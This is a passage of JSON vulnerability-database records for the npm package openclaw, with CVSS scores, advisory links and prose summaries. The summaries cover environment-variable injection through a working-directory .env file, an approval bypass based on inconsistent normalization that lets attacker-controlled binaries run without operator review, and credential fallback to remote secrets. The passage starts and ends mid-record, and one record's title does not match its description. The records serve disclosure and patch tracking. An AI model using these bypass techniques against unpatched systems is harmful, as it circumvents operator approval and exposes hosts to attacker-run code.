f63bcceb64a0096fd1586d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41294","reference_id":"CVE-2026-41294","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41294"},{"reference_url":"https://github.com/advisories/GHSA-8rh7-6779-cjqq","reference_id":"GHSA-8rh7-6779-cjqq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8rh7-6779-cjqq"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file","reference_id":"openclaw-environment-variable-injection-via-cwd-env-file","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41294","GHSA-8rh7-6779-cjqq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1smq-mbty-jkaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90105?format=json","vulnerability_id":"VCID-1ufd-uuqk-nbdv","summary":"Duplicate Advisory: OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3x4-hc5v-v2gm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject attacker-controlled environment variables into execution without approval system validation. Attackers can exploit differing normalization logic to discard non-portable keys during approval processing while accepting them at execution time, bypassing operator review and potentially influencing runtime behavior including execution of attacker-controlled binaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"},{"reference_url":"https://github.com/openclaw/openclaw/pull/59182","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/59182"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"},{"reference_url":"https://github.com/advisories/GHSA-8h8f-7cxm-m38j","reference_id":"GHSA-8h8f-7cxm-m38j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8h8f-7cxm-m38j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-8h8f-7cxm-m38j"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1ufd-uuqk-nbdv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91695?format=json","vulnerability_id":"VCID-1y7e-y41k-qyfc","summary":"OpenClaw: Unavailable local auth SecretRefs could fall through to remote credentials in local mode\n## Summary\nIn affected versions of `openclaw`, local gateway helper credential resolution treated configured but unavailable `gateway.auth.token` and `gateway.auth.password` SecretRefs as if they were unset and could fall back to `gateway.remote.*` credentials in local mode.\n\n## Impact\nThis could cause local CLI and helper paths to select the wrong credential source instead of failing closed for configured local auth SecretRefs. We did not confirm a server-side gateway-authentication boundary bypass for this issue.\n\n## Affected Packages and Versions\n- Package: 